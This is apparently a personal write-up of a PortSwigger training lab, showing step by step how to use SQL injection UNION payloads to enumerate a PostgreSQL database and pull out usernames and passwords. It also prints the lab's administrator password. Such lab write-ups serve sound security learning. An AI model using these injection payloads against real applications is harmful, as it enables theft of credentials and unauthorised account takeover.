SQL injection UNION attack, retrieving multiple values in a single column | Dec 4, 2022
Introduction
Welcome to my another writeup! In this Portswigger Labs lab, you’ll learn: SQL injection UNION attack, retrieving multiple values in a single column! Without further ado, let’s dive in.
- Overall difficulty for me (From 1-10 stars): ★☆☆☆☆☆☆☆☆☆
Background
This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called users
, with columns called username
and password
.
To solve the lab, perform an SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator
user.
Exploitation
Home page:
In the previous labs, we found an SQL injection vulnerability in the product category filter.
And we found that this table has 2 columns.
Now, to exploit this vulnerbility even further, we need find which column accept string data type via UNION
clause:
' UNION SELECT 'a',NULL-- -
We can see that the first column doesn’t accept string data type.
How about the second column?
' UNION SELECT NULL,'a'-- -
It accept string data type!
Then, we can enumerate this database much deeper!
Let’s find which DBMS(Database Management System) is using:
' UNION SELECT NULL,version()-- -
- DBMS information: PostgreSQL version 12.12
List all the tables in the current database:
' UNION SELECT NULL,table_name FROM information_schema.tables-- -
The users
table seems interesting!
List all the columns in the users
table:
' UNION SELECT NULL,column_name FROM information_schema.columns WHERE table_name='users'-- -
users
table column names:password
,username
Let’s extract all the data inside the users
table!
However, since we only have 1 column that accept string data type, we need to do string concatenation.
According to PortSwigger’s SQL injection cheat sheet, we can concatenate string via 2 pipes: ||
.
Payload:
' UNION SELECT NULL,username||':'||password FROM users-- -
We found user administrator
’s password! Let’s login as that user via the My account
link!
- Username: administrator
- Password: uin0c06mzov8uvbvfbwk
We’re logged in as administrator
!
Conclusion
What we’ve learned:
- SQL injection UNION attack, retrieving multiple values in a single column